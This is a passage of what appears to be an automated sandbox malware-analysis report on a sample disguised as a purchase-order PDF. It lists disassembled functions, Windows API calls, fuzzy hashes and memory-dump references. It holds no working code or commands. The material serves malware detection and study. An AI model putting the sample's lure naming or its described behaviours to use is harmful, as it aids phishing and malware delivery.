                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 167728f1ef0b290fa0ab537cd1f49c444f99f24bf3b7fe0b60cc3227d219d98d
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FEA16A71240601AFC760EF69C880A6BB7E9FB88304F10892EF649CB361EB75E945CB55
                                                                                                                                                                                                                                                                                                            Function 004099A8 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 228COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00409A61
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                                                                            • String ID: 0vH
                                                                                                                                                                                                                                                                                                            • API String ID: 1143807570-3662162768
                                                                                                                                                                                                                                                                                                            • Opcode ID: b21048a1283864c0ad3d78b56e2ee4487730c72500fe241c006d8f617f3a7356
                                                                                                                                                                                                                                                                                                            • Instruction ID: 5e67718e4417cbef977f4cc7974cb0b4b39b480e5382bb1977b3cac956c07efc
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b21048a1283864c0ad3d78b56e2ee4487730c72500fe241c006d8f617f3a7356
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53515BB1A083009FC718CF18C48065BB7E1FF88314F54856EF9999B391D779E942CB96
                                                                                                                                                                                                                                                                                                            Function 00466587 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID: HH$HH
                                                                                                                                                                                                                                                                                                            • API String ID: 0-1787419579
                                                                                                                                                                                                                                                                                                            • Opcode ID: 1035cddbf24351551dbdab1ae319d3ef1b3abdfc1c1abeb5567c5d17d410313e
                                                                                                                                                                                                                                                                                                            • Instruction ID: b2aab3850ea6996be17d3b26b1a0d96f4757dd5de2ef7d298d9c2790e2b3b10f
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1035cddbf24351551dbdab1ae319d3ef1b3abdfc1c1abeb5567c5d17d410313e
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1241BF367042009FC310EF69E881F5AF3A1EF99314F548A6EFA589B381D776E811CB95
                                                                                                                                                                                                                                                                                                            Function 00444652 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: InfoItemMenu_memset
                                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                                            • API String ID: 2223754486-4108050209
                                                                                                                                                                                                                                                                                                            • Opcode ID: 9b5c3065b697658fe030ed6790d4e8a4a56d1a31b4880524271bb7b0dc51ede2
                                                                                                                                                                                                                                                                                                            • Instruction ID: 143d79469fb3e570aa9bb1e7a79db7ad77638f8ab3c2e89d41e08a42c99b444e
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9b5c3065b697658fe030ed6790d4e8a4a56d1a31b4880524271bb7b0dc51ede2
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB3101721043009BF3249F18DC85BABBBE4EBC6310F14081FFA90C62A0E379D949C75A
                                                                                                                                                                                                                                                                                                            Function 00448358 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0044846C
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044847E
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                                                            • String ID: '
                                                                                                                                                                                                                                                                                                            • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                                                                            • Opcode ID: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                                                                                                                                                                                                                                                            • Instruction ID: cecdca06d5aa7ecc7109d5e1ff25192cbd540bafe2d1ef24ff7c1b98f096cb5f
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 984179706083459FE710CF18C880BABB7E1FB89700F54882EF9888B351DB75A841CF5A
                                                                                                                                                                                                                                                                                                            Function 00444571 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                                            • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                                                            • Opcode ID: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                                                                                                                                                                                                                                                            • Instruction ID: 268d240ecd79f719a1425e83c09d650ed443e1bf0ac8ef4f8d51517adc50c1d2
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6210D765042206BEB15DF08D844B97B7A4FBDA310F44492BEE9897250D379E848C7AA
                                                                                                                                                                                                                                                                                                            Function 0045126C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00451305
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00451313
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                                                            • String ID: Combobox
                                                                                                                                                                                                                                                                                                            • API String ID: 3850602802-2096851135
                                                                                                                                                                                                                                                                                                            • Opcode ID: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                                                                                                                                                                                                                                                            • Instruction ID: f266216a818347eeb58d59163185d0479ace604409515c443b0f4894c7ad90f2
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9110A72A0430067E6109AA4DC80F5BB3D8EB99735F10071BFA24E72E1D774FC448768
                                                                                                                                                                                                                                                                                                            Function 004515AB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 004515DA
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004515EA
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: LengthMessageSendTextWindow
                                                                                                                                                                                                                                                                                                            • String ID: edit
                                                                                                                                                                                                                                                                                                            • API String ID: 2978978980-2167791130
                                                                                                                                                                                                                                                                                                            • Opcode ID: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                                                                                                                                                                                                                                                                            • Instruction ID: b80de1f22085cd2d24dcce0fe83431d10f7d2aff66e66183492c5b70af3c9e13
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2011E4716003006BD6109A64D884F6BB3DCEBD8335F104B1EFA61D32E1D779EC458729
                                                                                                                                                                                                                                                                                                            Function 00474827 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00474833
                                                                                                                                                                                                                                                                                                            • GlobalMemoryStatusEx.KERNEL32 ref: 00474846
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                                                                            • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                                                                                            • Opcode ID: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                                                                                                                                                                                                                                                                                            • Instruction ID: 41c327e25453105c4ca6c880754d33c67e761007402a238c65fd2e715fefe222
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4421C230929A14B7C2107F6ABD4BB5E7BB8AF44716F008C5DF5C562094DF785268836F
                                                                                                                                                                                                                                                                                                            Function 004647A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: htonsinet_addr
                                                                                                                                                                                                                                                                                                            • String ID: 255.255.255.255
                                                                                                                                                                                                                                                                                                            • API String ID: 3832099526-2422070025
                                                                                                                                                                                                                                                                                                            • Opcode ID: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                                                                                                                                                                                                                                                                                                            • Instruction ID: e3b5e028fda38c0aed97ec3d425ece65e45bc088e5f3683a6f0e3ee8de0e9224
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F11253620030057DA10EB69C882F9BB394EFC4728F00896BFA105B283D679F45A832E
                                                                                                                                                                                                                                                                                                            Function 004694DE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469547
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                            • API String ID: 455545452-1403004172
                                                                                                                                                                                                                                                                                                            • Opcode ID: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                                                                                                                                                                                                                                                                            • Instruction ID: d7878a024921556205560296ec06e6abf53b779169672b4943ab7ad66f70e2c7
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2601D6327011106B8600BB299C019AFB39DDBC2370F544A2FF965573D1EA39AC0E476A
                                                                                                                                                                                                                                                                                                            Function 00442AFE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00442B8C
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
